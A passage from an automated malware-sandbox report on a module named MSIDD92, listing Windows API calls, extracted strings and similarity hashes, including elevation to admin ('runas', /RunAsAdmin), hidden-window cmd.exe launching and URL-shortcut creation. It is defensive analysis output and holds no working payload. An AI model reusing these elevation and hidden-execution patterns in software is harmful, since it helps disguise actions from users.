                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 0ccfcef768801cffd4e04fb24156e00a5b005bb9f57d4d8e2d97f8b14a69026f
                                                                      • Instruction ID: 9b2cde39d30b0c2b3de8dd739431eb61105db1d4a4187612583de0746fce5d1a
                                                                      • Opcode Fuzzy Hash: 0ccfcef768801cffd4e04fb24156e00a5b005bb9f57d4d8e2d97f8b14a69026f
                                                                      • Instruction Fuzzy Hash: 91F0E231621224ABEB312B7A9C45A6B37CCDF53771B18A212AC05E6290DF60D801CAF1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf$FreeLocal
                                                                      • String ID: %$+
                                                                      • API String ID: 2429749586-2626897407
                                                                      • Opcode ID: 6ddb1ce58ea9b15fbf6866f7f82ca90645062a44ff9518a216b2b63d97002160
                                                                      • Instruction ID: 82383b3340b1ed9b1339d384deca47146708c61e9aa67b84f6f23d7e8b5c93ea
                                                                      • Opcode Fuzzy Hash: 6ddb1ce58ea9b15fbf6866f7f82ca90645062a44ff9518a216b2b63d97002160
                                                                      • Instruction Fuzzy Hash: 8102B071E102199FDB15DF68CC41BAEBBB6FF49300F148629F815AB281E735A941CBB1
                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00D812C4
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00DD57C0,00000800), ref: 00D812E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQueryValue
                                                                      • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                      • API String ID: 4153817207-1914306501
                                                                      • Opcode ID: 8a238dd30cd1c64d663ac774ffca9a55fe55de37aeb4ff5ea0b023f33d064a69
                                                                      • Instruction ID: d064cc9d599419300c24075113991cfb4f0736a2cb0ec5efd4fa3fefafdfa62b
                                                                      • Opcode Fuzzy Hash: 8a238dd30cd1c64d663ac774ffca9a55fe55de37aeb4ff5ea0b023f33d064a69
                                                                      • Instruction Fuzzy Hash: 8EE1DE28A043528ACB34BF14C841776B3E9EF95B40F5D846AE985CB295E771CC8BC3B1
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00DB3EC1,00000002,00000000,?,?,?,00DB3EC1,?,00000000), ref: 00DB3C3C
                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00DB3EC1,00000002,00000000,?,?,?,00DB3EC1,?,00000000), ref: 00DB3C65
                                                                      • GetACP.KERNEL32(?,?,00DB3EC1,?,00000000), ref: 00DB3C7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 8693212dd22b1bd2618098af44bf11c818239eb14bb8e4e1c914ce05b8823a6e
                                                                      • Instruction ID: db39cc84e20603a95b7ed046389e07f41964118c61859a933058b6e6e0ad9f5f
                                                                      • Opcode Fuzzy Hash: 8693212dd22b1bd2618098af44bf11c818239eb14bb8e4e1c914ce05b8823a6e
                                                                      • Instruction Fuzzy Hash: E9217432600201EBDB348F99C901AE77BA6EF50B50B5E8528E94BE7214E732DF41E370
                                                                      APIs
                                                                        • Part of subcall function 00DAAE3C: GetLastError.KERNEL32(?,00000008,00DB03BC), ref: 00DAAE40
                                                                        • Part of subcall function 00DAAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00DAAEE2
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00DB3E84
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00DB3ECD
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00DB3EDC
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00DB3F24
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00DB3F43
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                      • String ID:
                                                                      • API String ID: 415426439-0
                                                                      • Opcode ID: 4d1db3a0994e7aec63a7a5b103f0173f42bfaa649aeb5bc21cd95aafac5f3b74
                                                                      • Instruction ID: 7a1c8d271d35b4a13c8a89c0b971fb15a436356acb73b9f7559d59964bc3f529
                                                                      • Opcode Fuzzy Hash: 4d1db3a0994e7aec63a7a5b103f0173f42bfaa649aeb5bc21cd95aafac5f3b74
                                                                      • Instruction Fuzzy Hash: 0F514D72A00206EBDB10DBA5CC45AFA77B9EF49700F18462AF906E7190EB71DA04DB71
                                                                      APIs
                                                                        • Part of subcall function 00DAAE3C: GetLastError.KERNEL32(?,00000008,00DB03BC), ref: 00DAAE40
                                                                        • Part of subcall function 00DAAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00DAAEE2
                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00DA994B,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00DB34D5
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00DA994B,?,?,?,00000055,?,-00000050,?,?), ref: 00DB3500
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00DB3663
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                      • String ID: utf8
                                                                      • API String ID: 607553120-905460609
                                                                      • Opcode ID: cc2b36bd1e7a362dbfc1062beed929d279d3a0624f036d0bfb8c94800ecad6bd
                                                                      • Instruction ID: a51e6ae1a99a881530f50f5842e860715e272788a4590656dea3c80295e333fd
                                                                      • Opcode Fuzzy Hash: cc2b36bd1e7a362dbfc1062beed929d279d3a0624f036d0bfb8c94800ecad6bd
                                                                      • Instruction Fuzzy Hash: B271DF72A00306EADB25AB75CC86BEA73E8EF45700F184429F547D7281FB74EA45A770
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _strrchr
                                                                      • String ID:
                                                                      • API String ID: 3213747228-0
                                                                      • Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                      • Instruction ID: 9b07df78de91f85cf5d5c02a550b8f93a2f42d29cd1ebf0acd32cafaa4633253
                                                                      • Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                      • Instruction Fuzzy Hash: 7AB12572D002459FDB118F68C8917EEBBA5EF5A320F18816BE845AB243D375DD02CBB0
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D983C9
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00D98495
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D984B5
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00D984BF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: 5354cf74d4906503f07c1e6f04f96b6d26a4417234aeef3992c54051cc97b42f
                                                                      • Instruction ID: 4f2789861a15293562cd7433f0462248672ba3188a577463a74519a5d93b75b7
                                                                      • Opcode Fuzzy Hash: 5354cf74d4906503f07c1e6f04f96b6d26a4417234aeef3992c54051cc97b42f
                                                                      • Instruction Fuzzy Hash: F1311875D01319DBDF10EFA4D989BCDBBB8AF09700F1041AAE40DAB250EB719A849F64
                                                                      APIs
                                                                      • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00D73270,?), ref: 00D82176
                                                                      • FormatMessageA.KERNEL32(00001300,00000000,862265DA,00000000,00000000,00000000,00000000,?,?,?,00D73270,?), ref: 00D82198
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FormatInfoLocaleMessage
                                                                      • String ID: !x-sys-default-locale
                                                                      • API String ID: 4235545615-2729719199
                                                                      • Opcode ID: 9efec3b980b7a140a5f42327f246874e36db5aacc0331c8f01c1027f51bf46ba
                                                                      • Instruction ID: 9e44b8dc49579cb52f5be6322534cff60b336e5a97b7f9f0baf5eccc6afaf26e
                                                                      • Opcode Fuzzy Hash: 9efec3b980b7a140a5f42327f246874e36db5aacc0331c8f01c1027f51bf46ba
                                                                      • Instruction Fuzzy Hash: 9AE039B6550218FEEB04AFA5CC0BDFA7B6DEB04790F104114B902D2180E2B06E008BB0

                                                                      Control-flow Graph
                                                                      • Legend: Executed / Not Executed
                                                                      • Graph image: basic blocks d77660-d77aac of the function whose APIs are listed below
                                                                      APIs
                                                                      • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00D7781F
                                                                      • GetForegroundWindow.USER32(?,?), ref: 00D778A4
                                                                      • ShellExecuteExW.SHELL32(?), ref: 00D778C1
                                                                      • ShellExecuteExW.SHELL32(?), ref: 00D778FF
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00D77942
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00D77949
                                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 00D77953
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00D77973
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00D7797A
                                                                      • Sleep.KERNEL32(00000064,?,?,?), ref: 00D77997
                                                                      • EnumWindows.USER32(00D77A90,?), ref: 00D779B3
                                                                      • BringWindowToTop.USER32(?), ref: 00D779C2
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00D779DF
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D779EC
                                                                        • Part of subcall function 00D77D30: CloseHandle.KERNEL32(?,862265DA,00000010,00000010,?,?), ref: 00D77D72
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00D77A9C
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00D77AB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                      • API String ID: 1023610922-986041216
                                                                      • Opcode ID: 5a3b2eabdcdf229e6efe0f0b09ca9fe4cd8dc52d3be14e3ec793bb18fd61f936
                                                                      • Instruction ID: 12c57786f11184dfca322beecc2d796e333b36cb7a8efdcf83e5192827e96019
                                                                      • Opcode Fuzzy Hash: 5a3b2eabdcdf229e6efe0f0b09ca9fe4cd8dc52d3be14e3ec793bb18fd61f936
                                                                      • Instruction Fuzzy Hash: 89E18F71A04249DFDB10DFA8C889AAEB7B5FF14310F188669E519EB291EB31D905CF70
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00D7880D
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00D78860
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D7886F
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00D7888B
                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D7896B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D78977
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D789B3
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D789D2
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D789EF
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D78A83
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00D78ACE
                                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00D78B1C
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D78B4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                      • API String ID: 2199533872-3004881174
                                                                      • Opcode ID: 537d29e61973d19469242fa1df840e1572d5bf01fd90689f80283c3112b63fd3
                                                                      • Instruction ID: 8fc5e2568d457a5ca1b9b93225285a79dcb750b62123429d49c2799e6536e647
                                                                      • Opcode Fuzzy Hash: 537d29e61973d19469242fa1df840e1572d5bf01fd90689f80283c3112b63fd3
                                                                      • Instruction Fuzzy Hash: 85C1F471940245DFEB209F68CC49BAFBBB5EF54700F18812AE5099B2C1FB748905DBB2
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00DD4AF8,00000FA0,?,?,00D97747), ref: 00D97775
                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00D97747), ref: 00D97780
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00D97747), ref: 00D97791
                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D977A3
                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D977B1
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D97747), ref: 00D977D4
                                                                      • DeleteCriticalSection.KERNEL32(00DD4AF8,00000007,?,?,00D97747), ref: 00D977F0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00D97747), ref: 00D97800
                                                                      Strings
                                                                      • SleepConditionVariableCS, xrefs: 00D9779D
                                                                      • kernel32.dll, xrefs: 00D9778C
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D9777B
                                                                      • WakeAllConditionVariable, xrefs: 00D977A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 2565136772-3242537097
                                                                      • Opcode ID: 1262429e27227e95c0759fc6a91188c407d2eec74a5c983ad635bbebe2829c7f
                                                                      • Instruction ID: 7840981c8fb7165d163fa46aa56ecbba607f6a3671345d2001c075cc64c26412
                                                                      • Opcode Fuzzy Hash: 1262429e27227e95c0759fc6a91188c407d2eec74a5c983ad635bbebe2829c7f
                                                                      • Instruction Fuzzy Hash: E5017575795711EFDB212F74AC0DE563769AF45B51F090116F805D7390EBB0C8048675
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,862265DA,?,00000000), ref: 00D7F076
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7F0B3
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7F11D
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7F2B9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7F376
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00D7F39E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 975656625-1062449267
                                                                      • Opcode ID: ba90e45360df8a7609fb9882c9a15bea123267efc00b3fda02c624d05b98c252
                                                                      • Instruction ID: ac0775bff3a1a75c82da179d9d8196ab6859d62f6294fd2cbb9c76f7204f9852
                                                                      • Opcode Fuzzy Hash: ba90e45360df8a7609fb9882c9a15bea123267efc00b3fda02c624d05b98c252
                                                                      • Instruction Fuzzy Hash: 27B182B1D00348DEEB21DFA4C945BDEBBF4EF14304F1481A9E448AB282E7759A48CB71
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,862265DA,?,00000000), ref: 00D76AC2
                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,862265DA,?,00000000), ref: 00D76AE3
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,862265DA,?,00000000), ref: 00D76B16
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,862265DA,?,00000000), ref: 00D76B27
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76B45
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76B61
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76B89
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76BA5
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76BC3
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76BDF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$Process$OpenTimes
                                                                      • String ID:
                                                                      • API String ID: 1711917922-0
                                                                      • Opcode ID: 431638078960712a2a92ccc601575f7f51ba910b519570f042c211afae199e4f
                                                                      • Instruction ID: 2075fde4c0c93fd0708221892a0c4a0a531aae6234935edfd121fa8386501d9e
                                                                      • Opcode Fuzzy Hash: 431638078960712a2a92ccc601575f7f51ba910b519570f042c211afae199e4f
                                                                      • Instruction Fuzzy Hash: 8A514C70D01618EBDB10DF98C988BEEFBB5AB49724F248219E518B7380E7749905CBB4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D9083B
                                                                        • Part of subcall function 00D8780A: __EH_prolog3.LIBCMT ref: 00D87811
                                                                        • Part of subcall function 00D8780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
                                                                        • Part of subcall function 00D8780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1538362411-2891247106
